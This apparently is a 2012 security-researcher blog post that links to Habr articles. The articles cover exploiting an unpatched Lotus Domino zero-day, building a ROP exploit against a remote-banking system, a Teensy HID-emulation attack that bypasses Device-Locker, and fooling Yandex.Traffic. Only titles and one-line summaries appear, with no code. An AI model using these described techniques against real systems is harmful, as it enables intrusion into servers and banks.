</div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0tag:blogger.com,1999:blog-4711612808026791519.post-15696348958308097872012-04-16T02:48:00.005-07:002012-04-16T03:10:12.567-07:00Learning to hack...<span><span style="font-size: 100%;">We continue our series of posts on Habr about hacking various services.</span></span><br /><span><span style="font-size: 100%;">I do not really want to cross-post, so I will just give a short description and links:</span></span><div style="font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "><br /></div><div style="font-family: Georgia, serif; font-size: 100%; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141275/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Penetrating Lotus Domino</a></h1><div>An already stale 
topic, but still an unpatched zero-day in Lotus Domino.<br />Description of the bug, description of the exploit:</div><div><br /></div><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141684/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Breaking a bank, smash-the-stack style!</a></h1></div><div><span><span style="font-size: 100%;">Hacking a </span>domestic<span style="font-size: 100%;"> remote banking system. Finding a classic strcpy vulnerability with NOT </span>dumb<span style="font-size: 100%;"> fuzzing. 
Building a ROP exploit.</span></span></div><div><br /></div><div><h1 class="title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 8px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(118, 118, 118); font-family: 'normal Verdana', Tahoma, sans-serif; font-weight: normal; line-height: 31px; background-color: rgb(255, 255, 255); "><a href="http://habrahabr.ru/company/dsec/blog/141838/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font-size: 27px; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Combat HID emulator on Arduino</a></h1></div><div>We use a "Teensy" to execute arbitrary code by emulating a HID device. Bypassing Device-Locker 8)</div><div><br /></div><div><a href="http://habrahabr.ru/company/dsec/blog/142166/" class="post_title" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Yandex.Traffic. 
Are you heading the right way?</a></div><div><br /></div><div>Fooling Yandex.Traffic.</div><div><br /></div><div><br /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0